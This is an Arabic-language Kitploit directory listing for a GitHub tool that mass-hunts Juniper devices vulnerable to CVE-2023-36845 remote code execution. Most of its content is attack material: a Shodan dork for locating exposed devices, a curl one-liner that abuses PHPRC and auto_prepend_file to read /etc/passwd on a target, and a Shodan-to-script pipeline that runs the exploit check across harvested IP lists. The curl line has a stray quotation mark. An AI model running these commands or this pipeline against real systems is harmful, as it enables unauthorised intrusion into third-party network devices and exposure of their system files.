Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Juniper-CVE-2023-36845-Mass-Hunting — Juniper RCE (Remote Code Execution) CVE-2023-36845 هي ثغرة أمنية تم تحديدها في برمجيات Juniper. يسمح هذا الخلل المحدد بتنفيذ التعليمات البرمجية عن بُعد، مما يعني أن المهاجم يمكنه تشغيل تعليمات برمجية عشوائية على النظام دون الحاجة إلى وصول مادي إلى الجهاز. | Kitploit
أدوات/GitHubGitHub/jahithoque/juniper-cve-2023-36845-mass-hunting
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubjahithoque/juniper-cve-2023-36845-mass-hunting

Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (Remote Code Execution) CVE-2023-36845 هي ثغرة أمنية تم تحديدها في برمجيات Juniper. يسمح هذا الخلل المحدد بتنفيذ التعليمات البرمجية عن بُعد، مما يعني أن المهاجم يمكنه تشغيل تعليمات برمجية عشوائية على النظام دون الحاجة إلى وصول مادي إلى الجهاز.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (Remote Code Execution) CVE-2023-36845 هي ثغرة أمنية تم تحديدها في برامج Juniper. يسمح هذا الخلل بتنفيذ التعليمات البرمجية عن بُعد، مما يعني أن المهاجم يمكنه تشغيل كود عشوائي على النظام دون الحاجة إلى وصول فعلي إلى الجهاز.

كيفية البحث:

Shodan dork: http.favicon.hash:2141724739

استخدمها مع استعلامات بحث أخرى ذات صلة مثل شهادات SSL واسم المؤسسة وغيرها للحصول على بحث أكثر استهدافًا.

استغلال الثغرة على مضيف واحد:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

الأتمتة:

└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com' #download from shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt IMAGE

تنزيل الأداة